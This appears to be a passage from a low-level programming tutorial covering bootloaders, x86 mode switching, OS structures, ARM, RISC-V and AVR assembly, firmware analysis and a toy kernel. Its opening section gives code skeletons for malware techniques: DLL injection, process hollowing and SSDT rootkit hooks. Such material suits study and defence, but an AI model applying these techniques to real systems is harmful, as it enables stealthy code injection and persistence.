jmp hook_function ; overwrites first 5 bytes
; ... (rest of function after overwritten bytes)Detours Library (Microsoft)
// Hook function with Detours
PBYTE OriginalMessageBox =
(PBYTE)DetourFindFunction("user32.dll", "MessageBoxA");
DetourTransactionBegin();
DetourUpdateThread(GetCurrentThread());
DetourAttach(&(PVOID&)OriginalMessageBox, HookedMessageBox);
DetourTransactionCommit();DLL Injection
// 1. Open target process
HANDLE hProcess = OpenProcess(
PROCESS_ALL_ACCESS, FALSE, pid);
// 2. Allocate memory in target
LPVOID pRemoteMemory = VirtualAllocEx(
hProcess, NULL, sizeof(dllpath),
MEM_COMMIT, PAGE_READWRITE);
// 3. Write DLL path
WriteProcessMemory(hProcess, pRemoteMemory,
dllpath, sizeof(dllpath), NULL);
// 4. Create remote thread to load DLL
HANDLE hThread = CreateRemoteThread(
hProcess, NULL, 0,
(LPTHREAD_START_ROUTINE)LoadLibraryA,
pRemoteMemory, 0, NULL);Process Hollowing
- Create process in suspended state
- Unmap original executable
- Allocate memory for malicious code
- Write malicious code
- Set entry point and resume
// Create suspended process
CreateProcess(..., CREATE_SUSPENDED, ...);
// Get thread context
GetThreadContext(hThread, &ctx);
// Unmap original executable
NtUnmapViewOfSection(hProcess, ctx.Rdx); // 64-bit
// Allocate memory for new executable
VirtualAllocEx(hProcess, imageBase, ...);
// Write new executable
WriteProcessMemory(...);
// Set new entry point
ctx.Rcx = newEntryPoint;
SetThreadContext(hThread, &ctx);
// Resume thread
ResumeThread(hThread);Kernel Rootkits
Load as kernel drivers:
- Hook system calls (SSDT)
- Hook interrupt handlers (IDT)
- Filter file system operations
- Hide processes/files
SSDT Hooking
// Save original syscall address
origNtOpenProcess =
(PVOID)KeServiceDescriptorTable->ServiceTable[0x7A];
// Replace with our function
KeServiceDescriptorTable->ServiceTable[0x7A] =
(PVOID)HookNtOpenProcess;
// In hook function
NTSTATUS HookNtOpenProcess(...) {
// Check if caller is allowed
if (IsMalicious(ProcessId))
return STATUS_ACCESS_DENIED;
// Call original
return origNtOpenProcess(...);
}Bootkits
Infect boot process:
- Master Boot Record (MBR)
- Volume Boot Record (VBR)
- UEFI firmware
MBR Infection
MBR Layout:
Offset 0x000: Boot code (446 bytes)
Offset 0x1BE: Partition table (64 bytes)
Offset 0x1FE: Signature 0x55AA
Bootkit:
- Replace boot code
- Load before OS
- Remain persistent
UEFI Rootkits
More sophisticated:
- Infect UEFI firmware
- Run at highest privilege
- Survive OS reinstall
- Can disable security features
Boot Sequence
- Power-on self-test (POST)
- BIOS initializes hardware
- BIOS searches for bootable devices
- Loads first sector (512 bytes) to 0x7C00
- Jumps to 0x7C00
Boot Sector Layout
Offset 0x000 - 0x1BD: Boot code
Offset 0x1BE - 0x1FD: Partition table
Offset 0x1FE - 0x1FF: Signature 0x55AA
Simple Bootloader
; boot.asm - Simple bootloader
[org 0x7C00]
[bits 16]
start:
; Set up segments
xor ax, ax
mov ds, ax
mov es, ax
mov ss, ax
mov sp, 0x7C00
; Print message
mov si, msg
call print_string
; Hang
jmp $
print_string:
lodsb
or al, al
jz .done
mov ah, 0x0E
int 0x10
jmp print_string
.done:
ret
msg db "Hello from bootloader!", 13, 10, 0
; Pad to 510 bytes
times 510-($-$$) db 0
dw 0xAA55Unified Extensible Firmware Interface.
UEFI Applications
// uefi_main.c
#include <efi.h>
#include <efilib.h>
EFI_STATUS
EFIAPI
efi_main(EFI_HANDLE ImageHandle, EFI_SYSTEM_TABLE *SystemTable) {
InitializeLib(ImageHandle, SystemTable);
Print(L"Hello from UEFI!\n");
return EFI_SUCCESS;
}UEFI Boot Services
- Memory allocation
- Protocol handlers
- Image loading
- Event handling
UEFI Runtime Services
- Variable services
- Time services
- Reset services
Stage 1: Load Second Stage
; Load more sectors
load_second_stage:
mov ah, 0x02 ; read sectors
mov al, 0x10 ; sectors to read
mov ch, 0 ; cylinder
mov cl, 2 ; sector (1-based)
mov dh, 0 ; head
mov dl, [boot_drive]; drive
mov bx, 0x1000 ; buffer
mov es, bx
xor bx, bx
int 0x13
jc disk_error
; Jump to second stage
jmp 0x1000:0x0000Entering Protected Mode
; Enable A20 line
enable_a20:
in al, 0x92
or al, 2
out 0x92, al
ret
; Load GDT
load_gdt:
lgdt [gdt_desc]
; Switch to protected mode
mov eax, cr0
or eax, 1
mov cr0, eax
; Far jump to flush pipeline
jmp 0x08:protected_mode
[bits 32]
protected_mode:
mov ax, 0x10 ; data segment
mov ds, ax
mov es, ax
mov fs, ax
mov gs, ax
mov ss, ax
mov esp, 0x90000GDT for Protected Mode
gdt_start:
; Null descriptor
dq 0
; Code segment
dw 0xFFFF ; limit 0-15
dw 0 ; base 0-15
db 0 ; base 16-23
db 0x9A ; present, ring0, code, readable
db 0xCF ; 4KB granularity, 32-bit, limit 16-19
db 0 ; base 24-31
; Data segment
dw 0xFFFF
dw 0
db 0
db 0x92 ; present, ring0, data, writable
db 0xCF
db 0
gdt_end:
gdt_desc:
dw gdt_end - gdt_start - 1
dd gdt_startSwitching to 64-bit Long Mode
; Check for long mode support
check_long_mode:
mov eax, 0x80000000
cpuid
cmp eax, 0x80000001
jb no_long_mode
mov eax, 0x80000001
cpuid
test edx, 1 << 29 ; LM bit
jz no_long_mode
ret
; Set up paging
setup_paging:
; Clear page tables
mov edi, 0x1000
mov cr3, edi
xor eax, eax
mov ecx, 4096
rep stosd
; Set up PML4
mov edi, cr3
mov dword [edi], 0x2003 ; PDPT at 0x2000, present/write
; Set up PDPT
mov edi, 0x2000
mov dword [edi], 0x3003 ; PD at 0x3000, present/write
; Set up PD
mov edi, 0x3000
mov dword [edi], 0x4003 ; PT at 0x4000, present/write
; Set up PT (identity map first 2MB)
mov edi, 0x4000
mov eax, 3 ; present/write
mov ecx, 512
.map_2mb:
mov [edi], eax
add eax, 0x1000
add edi, 8
loop .map_2mb
ret
; Enable long mode
enable_long_mode:
; Enable PAE
mov eax, cr4
or eax, 1 << 5
mov cr4, eax
; Set EFER.LME
mov ecx, 0xC0000080
rdmsr
or eax, 1 << 8
wrmsr
; Enable paging
mov eax, cr0
or eax, 1 << 31
mov cr0, eax
retIDT Setup in Long Mode
; Set up IDT entry
; RDI = index, RSI = handler, RDX = type
setup_idt_entry:
push rbp
mov rbp, rsp
; Calculate offset
shl rdi, 4 ; each entry 16 bytes
add rdi, idt_base
; Set low offset
mov [rdi], si
shr rsi, 16
mov [rdi+2], si ; segment selector (assume 0x08)
mov word [rdi+4], 0 ; IST (unused)
; Set type
mov byte [rdi+5], 0x8E ; present, ring0, interrupt gate
; Set high offset
shr rsi, 16
mov [rdi+6], si
shr rsi, 16
mov [rdi+8], si
mov dword [rdi+12], 0
pop rbp
retInterrupt Handler Template
; Common interrupt handler stub
interrupt_handler:
; Save all registers
push rax
push rbx
push rcx
push rdx
push rsi
push rdi
push rbp
push r8
push r9
push r10
push r11
push r12
push r13
push r14
push r15
; Call C handler
mov rdi, [rsp+120] ; interrupt number
mov rsi, rsp ; register frame
call c_handler
; Restore registers
pop r15
pop r14
pop r13
pop r12
pop r11
pop r10
pop r9
pop r8
pop rbp
pop rdi
pop rsi
pop rdx
pop rcx
pop rbx
pop rax
iretqGDT for Long Mode
; Long mode GDT
gdt64:
dq 0 ; null descriptor
dq 0x0020980000000000 ; 64-bit code segment
dq 0x0000920000000000 ; 64-bit data segment
gdt64_desc:
dw $ - gdt64 - 1
dq gdt64Task State Segment (TSS)
; TSS structure
struc tss
.reserved1 resd 1
.rsp0 resq 1 ; stack for ring 0
.rsp1 resq 1 ; stack for ring 1
.rsp2 resq 1 ; stack for ring 2
.reserved2 resd 1
.ist1 resq 1 ; interrupt stack table
.ist2 resq 1
.ist3 resq 1
.ist4 resq 1
.ist5 resq 1
.ist6 resq 1
.ist7 resq 1
.reserved3 resd 1
.iomap resw 1 ; I/O map base
endstruc
; Load TSS
load_tss:
mov ax, 0x28 ; TSS segment selector
ltr ax
retIdentity Mapping
; Identity map first 4GB
identity_map:
; PML4 entry points to PDPT
mov rax, 0x2000
or rax, 3 ; present, writable
mov [0x1000], rax
; PDPT entry points to PD
mov rax, 0x3000
or rax, 3
mov [0x2000], rax
; PD entries (512 * 2MB = 1GB)
mov rdi, 0x3000
mov rax, 0x83 ; present, writable, huge page
mov rcx, 512
.map_pd:
mov [rdi], rax
add rax, 0x200000 ; next 2MB
add rdi, 8
loop .map_pd
retPage Fault Handler
page_fault_handler:
; Get faulting address from CR2
mov rax, cr2
; Check if address is valid
; (simplified - just allocate page)
; Allocate physical page
call alloc_page
; Map page at faulting address
mov rdi, rax ; virtual address
mov rsi, rax ; physical address (identity mapping)
call map_page
; Return from fault (instruction will be retried)
iretqSoftware Task Switching
; Save current task context
save_context:
; Save registers to TSS or task structure
mov [task_struct + Task.rax], rax
mov [task_struct + Task.rbx], rbx
; ... save others
; Save stack pointer
mov [task_struct + Task.rsp], rsp
; Save instruction pointer from return address
mov rax, [rsp]
mov [task_struct + Task.rip], rax
ret
; Switch to next task
switch_task:
; Save current
call save_context
; Select next task (simplified round-robin)
mov rax, [current_task]
inc rax
cmp rax, [task_count]
jl .set_current
xor rax, rax
.set_current:
mov [current_task], rax
; Load new task
mov rbx, [task_list + rax*8]
; Restore stack
mov rsp, [rbx + Task.rsp]
; Restore other registers
mov rax, [rbx + Task.rax]
mov rbx, [rbx + Task.rbx]
; ... restore others
; Jump to saved instruction pointer
retPCI Configuration
; Read PCI config space
; EDI = bus:device:function, ESI = offset
pci_read_config:
mov eax, 0x80000000
or eax, edi ; bus:device:function
or eax, esi ; offset
mov dx, 0xCF8
out dx, eax
mov dx, 0xCFC
in eax, dx
ret
; Write PCI config space
pci_write_config:
push rax
mov eax, 0x80000000
or eax, edi
or eax, esi
mov dx, 0xCF8
out dx, eax
pop rax
mov dx, 0xCFC
out dx, eax
retSimple UART Driver
; COM1 base address
COM1 equ 0x3F8
; Initialize UART
uart_init:
; Set baud rate divisor
mov dx, COM1 + 3 ; line control register
mov al, 0x80 ; enable DLAB
out dx, al
mov dx, COM1 ; divisor low
mov al, 1 ; 115200 baud
out dx, al
mov dx, COM1 + 1 ; divisor high
xor al, al
out dx, al
; Set line parameters
mov dx, COM1 + 3
mov al, 3 ; 8 bits, no parity, 1 stop
out dx, al
; Enable FIFO
mov dx, COM1 + 2
mov al, 0xC7
out dx, al
ret
; Send character
uart_putc:
push rax
mov dx, COM1 + 5 ; line status
.wait:
in al, dx
test al, 0x20 ; transmitter holding register empty?
jz .wait
pop rax
mov dx, COM1
out dx, al
retKey Differences
| Feature | ARM | x86 |
|---|---|---|
| Instruction set | RISC | CISC |
| Registers | 16-32 general purpose | 8-16 general purpose |
| Instruction length | Fixed (32/16-bit) | Variable |
| Addressing | Load-store | Memory operands |
| Conditionals | Conditional execution | Conditional jumps |
| Endianness | Bi-endian | Little-endian |
ARM32 (AArch32)
R0-R3: Argument/scratch registers
R4-R11: Callee-saved registers
R12: IP (intra-procedure scratch)
R13: SP (stack pointer)
R14: LR (link register)
R15: PC (program counter)
CPSR: Current Program Status Register
N: Negative flag
Z: Zero flag
C: Carry flag
V: Overflow flag
I: IRQ disable
F: FIQ disable
T: Thumb state
M: Mode bits
ARM64 (AArch64)
X0-X7: Argument/result registers
X8: Indirect result location register
X9-X15: Temporary registers
X16-X17: Intra-procedure scratch
X18: Platform register
X19-X28: Callee-saved
X29: FP (frame pointer)
X30: LR (link register)
SP: Stack pointer
PC: Program counter
NZCV: Condition flags (in PSTATE)
Data Processing Instructions
; Arithmetic
ADD R0, R1, R2 ; R0 = R1 + R2
SUB R0, R1, R2 ; R0 = R1 - R2
RSB R0, R1, R2 ; R0 = R2 - R1 (reverse subtract)
; Logical
AND R0, R1, R2 ; R0 = R1 & R2
ORR R0, R1, R2 ; R0 = R1 | R2
EOR R0, R1, R2 ; R0 = R1 ^ R2
BIC R0, R1, R2 ; R0 = R1 & ~R2
; Move
MOV R0, #42 ; R0 = 42
MVN R0, R1 ; R0 = ~R1
; Compare (set flags only)
CMP R0, R1 ; set flags based on R0 - R1
CMN R0, R1 ; set flags based on R0 + R1
TST R0, R1 ; set flags based on R0 & R1
TEQ R0, R1 ; set flags based on R0 ^ R1Load/Store Instructions
; Single register
LDR R0, [R1] ; R0 = *R1
STR R0, [R1] ; *R1 = R0
; With offset
LDR R0, [R1, #4] ; R0 = *(R1 + 4)
LDR R0, [R1, R2] ; R0 = *(R1 + R2)
LDR R0, [R1, R2, LSL #2] ; R0 = *(R1 + (R2<<2))
; Pre-indexed
LDR R0, [R1, #4]! ; R1 += 4, then R0 = *R1
; Post-indexed
LDR R0, [R1], #4 ; R0 = *R1, then R1 += 4
; Multiple registers
LDMIA R0!, {R1-R4} ; Load multiple, increment after
STMDB R0!, {R1-R4} ; Store multiple, decrement beforeBranch Instructions
B label ; unconditional branch
BL label ; branch and link (call)
BX R0 ; branch and exchange to register
BLX R0 ; branch with link and exchange
; Conditional branches
BEQ label ; branch if equal (Z=1)
BNE label ; branch if not equal (Z=0)
BGT label ; branch if greater than (signed)
BLT label ; branch if less than (signed)16-bit compressed instruction set.
Thumb vs ARM
; ARM mode (32-bit)
ADD R0, R1, R2 ; 4 bytes
; Thumb mode (16-bit)
ADD R0, R1 ; R0 += R1 (2 bytes)Thumb-2
Mixed 16/32-bit instructions:
IT EQ ; If-Then (next 1-4 instructions conditional)
ADD R0, R1 ; executed if EQ
ADD R2, R3 ; not part of IT blockAArch64 Instructions
; Data processing
ADD X0, X1, X2 ; X0 = X1 + X2
SUB X0, X1, X2 ; X0 = X1 - X2
AND X0, X1, X2 ; X0 = X1 & X2
; Load/store
LDR X0, [X1] ; X0 = *X1
STR X0, [X1] ; *X1 = X0
LDP X0, X1, [X2] ; load pair
; Branches
B label ; unconditional
BL label ; branch with link
RET ; return from functionFunction Call Example
; int add(int a, int b) { return a + b; }
add:
ADD W0, W0, W1 ; W0 = W0 + W1 (32-bit)
RET
; int main() { return add(5, 3); }
main:
MOV W0, #5 ; first argument
MOV W1, #3 ; second argument
BL add ; call add
RET ; returnDesign Philosophy
- Clean-slate design
- Open ISA
- Modular extensions
- Suitable for all implementations
Base Integer ISA (RV32I/RV64I)
- 32-bit (RV32I) or 64-bit (RV64I)
- 32 registers (x0-x31)
- Simple load-store architecture
- Few instruction formats
R-Type (Register-Register)
funct7 | rs2 | rs1 | funct3 | rd | opcode
7 bits |5 bits|5 bits|3 bits|5 bits|7 bits
Example: ADD x1, x2, x3
I-Type (Immediate)
immediate[11:0] | rs1 | funct3 | rd | opcode
12 bits |5 bits|3 bits|5 bits|7 bits
Example: ADDI x1, x2, 100
S-Type (Store)
imm[11:5] | rs2 | rs1 | funct3 | imm[4:0] | opcode
7 bits |5 bits|5 bits|3 bits| 5 bits |7 bits
Example: SW x1, 100(x2)
B-Type (Branch)
imm[12,10:5] | rs2 | rs1 | funct3 | imm[4:1,11] | opcode
7 bits |5 bits|5 bits|3 bits| 5 bits |7 bits
Example: BEQ x1, x2, label
U-Type (Upper Immediate)
immediate[31:12] | rd | opcode
20 bits |5 bits|7 bits
Example: LUI x1, 0x12345
J-Type (Jump)
immediate[20,10:1,11,19:12] | rd | opcode
20 bits |5 bits|7 bits
Example: JAL x1, label
Control and Status Registers.
Common CSRs
mstatus: Machine status
mtvec: Machine trap handler base
mepc: Machine exception PC
mcause: Machine exception cause
mtval: Machine trap value
mip: Machine interrupt pending
mie: Machine interrupt enable
CSR Instructions
CSRRW rd, csr, rs1 ; atomic read/write
CSRRS rd, csr, rs1 ; atomic read/set bits
CSRRC rd, csr, rs1 ; atomic read/clear bits
CSRRWI rd, csr, imm ; read/write immediate
CSRRSI rd, csr, imm ; read/set immediate
CSRRCI rd, csr, imm ; read/clear immediateRV32E for Embedded
- 16 registers (x0-x15)
- Reduced area
- Same ISA otherwise
Example: Blink LED
# GPIO base address
.equ GPIO_BASE, 0x10012000
.equ GPIO_OUT, 0x00
.equ GPIO_DIR, 0x04
.section .text
.globl _start
_start:
# Set up stack
la sp, _stack_top
# Configure GPIO
li t0, GPIO_BASE
# Set pin 5 as output
li t1, (1 << 5)
sw t1, GPIO_DIR(t0)
loop:
# Turn LED on
sw t1, GPIO_OUT(t0)
# Delay
li a0, 100000
call delay
# Turn LED off
sw zero, GPIO_OUT(t0)
# Delay
li a0, 100000
call delay
j loop
delay:
li t0, 0
1:
addi t0, t0, 1
blt t0, a0, 1b
retAVR Architecture
- 8-bit RISC
- 32 8-bit registers (R0-R31)
- Some registers have special functions:
- R26-R27: X pointer
- R28-R29: Y pointer
- R30-R31: Z pointer
Basic Instructions
; Data transfer
LDI R16, 0xFF ; load immediate
MOV R0, R1 ; copy register
LD R0, X ; load indirect
ST X, R0 ; store indirect
; Arithmetic
ADD R0, R1 ; add
SUB R0, R1 ; subtract
INC R0 ; increment
DEC R0 ; decrement
; Logic
AND R0, R1 ; and
OR R0, R1 ; or
EOR R0, R1 ; xor
COM R0 ; complement
; Branch
RJMP label ; relative jump
RCALL label ; relative call
RET ; return
BRNE label ; branch if not equalExample: Blink LED
; ATmega328P (Arduino Uno)
.equ DDRB, 0x04
.equ PORTB, 0x05
.org 0
rjmp main
main:
; Set pin 5 as output
ldi r16, (1 << 5)
out DDRB, r16
loop:
; Turn LED on
sbi PORTB, 5
; Delay
ldi r18, 100
call delay
; Turn LED off
cbi PORTB, 5
; Delay
ldi r18, 100
call delay
rjmp loop
delay:
ldi r16, 255
1: ldi r17, 255
2: dec r17
brne 2b
dec r16
brne 1b
dec r18
brne delay
retARM Cortex-M microcontrollers.
STM32F4 Example
; STM32F4 Discovery - Blink LED
.syntax unified
.cpu cortex-m4
.thumb
.equ RCC_AHB1ENR, 0x40023830
.equ GPIOD_MODER, 0x40020C00
.equ GPIOD_ODR, 0x40020C14
.section .text
.global _start
_start:
; Enable GPIOD clock
ldr r0, =RCC_AHB1ENR
ldr r1, [r0]
orr r1, r1, #(1 << 3) ; bit 3 for GPIOD
str r1, [r0]
; Configure PD12 as output
ldr r0, =GPIOD_MODER
ldr r1, [r0]
bic r1, r1, #(3 << 24) ; clear bits 24-25 (PD12)
orr r1, r1, #(1 << 24) ; set to output (01)
str r1, [r0]
loop:
; LED on
ldr r0, =GPIOD_ODR
ldr r1, [r0]
orr r1, r1, #(1 << 12) ; set PD12 high
str r1, [r0]
; Delay
ldr r2, =1000000
1: subs r2, r2, #1
bne 1b
; LED off
ldr r0, =GPIOD_ODR
ldr r1, [r0]
bic r1, r1, #(1 << 12) ; set PD12 low
str r1, [r0]
; Delay
ldr r2, =1000000
2: subs r2, r2, #1
bne 2b
b loop
.section .stack
.space 1024
_stack_top:Peripherals controlled via memory addresses.
GPIO Registers
; Typical GPIO register layout
struc gpio_regs
.moder resd 1 ; mode register
.otyper resd 1 ; output type
.ospeedr resd 1 ; output speed
.pupdr resd 1 ; pull-up/down
.idr resd 1 ; input data
.odr resd 1 ; output data
.bsrr resd 1 ; bit set/reset
.lckr resd 1 ; lock
.afrl resd 1 ; alternate function low
.afrh resd 1 ; alternate function high
endstruc
; Set pin as output
mov eax, [gpio_base + gpio_regs.moder]
and eax, ~(3 << (pin*2)) ; clear mode bits
or eax, (1 << (pin*2)) ; set to output
mov [gpio_base + gpio_regs.moder], eax
; Write to pin
mov eax, 1 << pin
mov [gpio_base + gpio_regs.bsrr], eax ; set
mov [gpio_base + gpio_regs.bsrr], eax << 16 ; resetInput Configuration
; Configure pin as input with pull-up
; Clear mode bits (00 = input)
mov eax, [gpio_base + gpio_regs.moder]
and eax, ~(3 << (pin*2))
mov [gpio_base + gpio_regs.moder], eax
; Configure pull-up
mov eax, [gpio_base + gpio_regs.pupdr]
and eax, ~(3 << (pin*2))
or eax, (1 << (pin*2)) ; 01 = pull-up
mov [gpio_base + gpio_regs.pupdr], eax
; Read input
mov eax, [gpio_base + gpio_regs.idr]
shr eax, pin
and eax, 1 ; get pin valueInterrupt on Pin Change
; Enable EXTI interrupt on pin
; Configure SYSCFG to route GPIO to EXTI
mov eax, [SYSCFG_EXTICR + (pin/4)*4]
and eax, ~(0xF << ((pin%4)*4))
or eax, (port << ((pin%4)*4))
mov [SYSCFG_EXTICR + (pin/4)*4], eax
; Configure EXTI
mov eax, 1 << pin
mov [EXTI_IMR], eax ; unmask interrupt
mov [EXTI_RTSR], eax ; rising edge trigger
; Set interrupt priority
mov byte [NVIC_IPR(EXTI_IRQn)], 0
; Enable interrupt in NVIC
mov eax, 1 << EXTI_IRQn
mov [NVIC_ISER], eaxNVIC (Nested Vectored Interrupt Controller)
; Set interrupt priority
; NVIC_IPR[n] = priority (4 bits per interrupt)
mov r0, #EXTI0_IRQn
lsr r1, r0, #2 ; which IPR register
lsl r0, r0, #3 ; offset in register (8 bits per interrupt)
and r0, r0, #0x1F ; bit position
mov r2, #0x80 ; priority (128)
lsl r2, r2, r0
ldr r3, =NVIC_IPR_BASE
str r2, [r3, r1, lsl #2]
; Enable interrupt
mov r0, #EXTI0_IRQn
lsr r1, r0, #5 ; which ISER register
lsl r0, r0, #0x1F ; bit in register
mov r2, #1
lsl r2, r2, r0
ldr r3, =NVIC_ISER_BASE
str r2, [r3, r1, lsl #2]Interrupt Handler
; EXTI0 interrupt handler
EXTI0_IRQHandler:
push {r0-r3, lr}
; Check if EXTI0 triggered
ldr r0, =EXTI_PR
ldr r1, [r0]
tst r1, #1
beq .done
; Clear pending bit
str r1, [r0]
; Handle interrupt
bl handle_button_press
.done:
pop {r0-r3, pc}CMOS memory stores system configuration.
CMOS Access
; Read CMOS register
; AL = register number
read_cmos:
out 0x70, al ; select register
in al, 0x71 ; read data
ret
; Write CMOS register
; AL = register number, AH = data
write_cmos:
out 0x70, al
mov al, ah
out 0x71, al
retCommon CMOS Registers
0x00: Seconds
0x02: Minutes
0x04: Hours
0x07: Day of month
0x08: Month
0x09: Year
0x0A: Status register A
0x0B: Status register B
0x0C: Status register C
0x0D: Status register D
0x10: Floppy drive type
0x12: Hard disk type
0x14: Equipment list
Advanced Configuration and Power Interface.
ACPI Tables
RSDP (Root System Description Pointer)
- Signature "RSD PTR "
- Checksum
- OEM ID
- RSDT address
RSDT (Root System Description Table)
- Pointers to other tables
- FADT, MADT, SSDT, etc.
FADT (Fixed ACPI Description Table)
- Power management info
- DSDT address
- SCI interrupt
Finding ACPI Tables
; Search for RSDP in BIOS memory
find_rsdp:
mov esi, 0xE0000 ; start of BIOS area
.search_loop:
cmp dword [esi], 'RSD ' ; "RSD "
jne .next
cmp dword [esi+4], 'PTR ' ; " PTR"
je .found
.next:
add esi, 16
cmp esi, 0x100000
jl .search_loop
xor eax, eax ; not found
ret
.found:
mov eax, esi
retUEFI Runtime Services
// Get variable
EFI_STATUS GetVariable(
CHAR16 *VariableName,
EFI_GUID *VendorGuid,
UINT32 *Attributes,
UINTN *DataSize,
VOID *Data
);
// Set variable
EFI_STATUS SetVariable(
CHAR16 *VariableName,
EFI_GUID *VendorGuid,
UINT32 Attributes,
UINTN DataSize,
VOID *Data
);
// Get time
EFI_STATUS GetTime(
EFI_TIME *Time,
EFI_TIME_CAPABILITIES *Capabilities
);UEFI Protocols
// Simple File System Protocol
struct EFI_SIMPLE_FILE_SYSTEM_PROTOCOL {
UINT64 Revision;
EFI_OPEN_VOLUME OpenVolume;
};
// Get file system handle
EFI_SIMPLE_FILE_SYSTEM_PROTOCOL *FileSystem;
status = BS->HandleProtocol(
DeviceHandle,
&gEfiSimpleFileSystemProtocolGuid,
(VOID**)&FileSystem
);
// Open volume
EFI_FILE_PROTOCOL *Root;
status = FileSystem->OpenVolume(FileSystem, &Root);Extracting Firmware
# Dump BIOS from Linux
flashrom -r bios.bin
# Extract UEFI firmware
# from /sys/firmware/efi/efivars/
# or from flash chipAnalyzing Firmware
# Check strings
strings bios.bin | grep -i "copyright\|version\|model"
# Check entropy
binwalk -E bios.bin
# Extract components
binwalk -e bios.binCommon Firmware Structures
UEFI Firmware Volume:
- Volume header
- File system
- FFS files (PE/COFF images)
BIOS:
- POST code
- Runtime services
- ACPI tables
- VGA BIOS option ROMs
Finding Entry Points
; Look for BIOS entry point
; Usually at F000:FFF0 (reset vector)
; Contains far jump to POST code
; UEFI SEC/PEI phase entry
; Look for specific GUIDs in firmware volumeStage 1 Bootloader
; boot1.asm - First stage bootloader
[org 0x7C00]
[bits 16]
start:
; Set up segments
xor ax, ax
mov ds, ax
mov es, ax
mov ss, ax
mov sp, 0x7C00
; Save boot drive
mov [boot_drive], dl
; Print message
mov si, msg_boot1
call print_string
; Load second stage
mov si, msg_loading
call print_string
mov ah, 0x02 ; read sectors
mov al, 0x20 ; sectors to read
mov ch, 0 ; cylinder
mov cl, 2 ; sector
mov dh, 0 ; head
mov dl, [boot_drive]
mov bx, 0x1000 ; buffer segment
mov es, bx
xor bx, bx
int 0x13
jc disk_error
; Jump to second stage
jmp 0x1000:0x0000
disk_error:
mov si, msg_error
call print_string
jmp $
print_string:
lodsb
or al, al
jz .done
mov ah, 0x0E
int 0x10
jmp print_string
.done:
ret
boot_drive db 0
msg_boot1 db "TinyOS Bootloader Stage 1", 13, 10, 0
msg_loading db "Loading Stage 2...", 13, 10, 0
msg_error db "Disk error!", 13, 10, 0
times 510-($-$$) db 0
dw 0xAA55Stage 2 Bootloader
; boot2.asm - Second stage bootloader
[org 0x0000]
[bits 16]
start:
; Set up segments
mov ax, cs
mov ds, ax
mov es, ax
mov ss, ax
mov sp, 0xFFFF
; Print message
mov si, msg_boot2
call print_string
; Enable A20 line
call enable_a20
; Load kernel
mov si, msg_load_kernel
call print_string
; Load kernel from disk
mov ah, 0x02
mov al, 0x40 ; 64 sectors (32KB)
mov ch, 0
mov cl, 0x22 ; after boot sectors
mov dh, 0
mov dl, [boot_drive]
mov bx, 0x2000 ; kernel segment
mov es, bx
xor bx, bx
int 0x13
jc disk_error
; Switch to protected mode
call switch_to_pm
; Should never return
jmp $
enable_a20:
in al, 0x92
or al, 2
out 0x92, al
ret
; ... print_string, disk_error as before ...
%include "gdt.inc"
switch_to_pm:
cli
lgdt [gdt_desc]
mov eax, cr0
or eax, 1
mov cr0, eax
jmp 0x08:pm_start
[bits 32]
pm_start:
mov ax, 0x10
mov ds, ax
mov es, ax
mov fs, ax
mov gs, ax
mov ss, ax
mov esp, 0x90000
; Jump to kernel
jmp 0x2000:0x0000
boot_drive db 0
msg_boot2 db "TinyOS Bootloader Stage 2", 13, 10, 0
msg_load_kernel db "Loading kernel...", 13, 10, 0Minimal Kernel
// kernel.c - Minimal kernel
void kernel_main(void) {
// VGA text mode buffer
char *video = (char*)0xB8000;
char *message = "Hello from TinyOS Kernel!";
// Clear screen
for (int i = 0; i < 80 * 25 * 2; i += 2) {
video[i] = ' ';
video[i + 1] = 0x07;
}
// Print message
int i = 0;
while (message[i]) {
video[i * 2] = message[i];
video[i * 2 + 1] = 0x0A; // green
i++;
}
// Hang
while (1) {
__asm__("hlt");
}
}Linker Script
/* kernel.ld */
OUTPUT_FORMAT(elf32-i386)
ENTRY(kernel_main)
SECTIONS
{
. = 0x200000;
.text : {
*(.text)
*(.text.*)
}
.data : {
*(.data)
*(.data.*)
}
.bss : {
*(.bss)
*(.bss.*)
}
/DISCARD/ : {
*(.comment)
*(.eh_frame)
}
}Simple Page Allocator
// memory.c - Physical memory manager
#define PAGE_SIZE 4096
#define PAGE_COUNT (1024 * 1024) // 4GB / 4KB
static uint32_t page_bitmap[PAGE_COUNT / 32];
void init_memory(uint32_t memory_size) {
// Mark all pages as used initially
for (int i = 0; i < PAGE_COUNT / 32; i++) {
page_bitmap[i] = 0xFFFFFFFF;
}
// Mark kernel memory as used
uint32_t kernel_pages = (uint32_t)&_kernel_end - 0x200000;
kernel_pages = (kernel_pages + PAGE_SIZE - 1) / PAGE_SIZE;
for (uint32_t i = 0; i < kernel_pages + 1; i++) {
uint32_t index = i / 32;
uint32_t bit = i % 32;
page_bitmap[index] &= ~(1 << bit);
}
}
void* alloc_page(void) {
for (int i = 0; i < PAGE_COUNT / 32; i++) {
if (page_bitmap[i] != 0) {
// Find first free bit
int bit = __builtin_ctz(page_bitmap[i]);
page_bitmap[i] &= ~(1 << bit);
return (void*)((i * 32 + bit) * PAGE_SIZE);
}
}
return NULL; // Out of memory
}
void free_page(void* page) {
uint32_t pfn = (uint32_t)page / PAGE_SIZE;
uint32_t index = pfn / 32;
uint32_t bit = pfn % 32;
page_bitmap[index] |= (1 << bit);
}Round-Robin Scheduler
// scheduler.c
#define MAX_TASKS 64
#define STACK_SIZE 4096
typedef struct {
uint32_t esp;
uint32_t ebp;
uint32_t eip;
uint32_t state; // 0 = free, 1 = ready, 2 = running
uint8_t stack[STACK_SIZE];
} task_t;
static task_t tasks[MAX_TASKS];
static int current_task = -1;
static int next_task = 0;
void scheduler_init(void) {
for (int i = 0; i < MAX_TASKS; i++) {
tasks[i].state = 0; // free
}
}
int create_task(void (*entry)(void)) {
// Find free task slot
int i;
for (i = 0; i < MAX_TASKS; i++) {
if (tasks[i].state == 0) break;
}
if (i == MAX_TASKS) return -1;
// Initialize stack
uint32_t *stack = (uint32_t*)(tasks[i].stack + STACK_SIZE - 4);
// Set up initial context (for context switch)
*--stack = (uint32_t)entry; // EIP
*--stack = 0; // EFLAGS
*--stack = 0; // EAX
*--stack = 0; // ECX
*--stack = 0; // EDX
*--stack = 0; // EBX
*--stack = 0; // ESP (unused)
*--stack = (uint32_t)stack + 32; // EBP
*--stack = 0; // ESI
*--stack = 0; // EDI
tasks[i].esp = (uint32_t)stack;
tasks[i].state = 1; // ready
return i;
}
// Called by timer interrupt
void schedule(void) {
if (current_task != -1) {
// Save current task state
__asm__ volatile(
"mov %%esp, %0\n"
"mov %%ebp, %1\n"
: "=r"(tasks[current_task].esp),
"=r"(tasks[current_task].ebp)
);
tasks[current_task].state = 1;
}
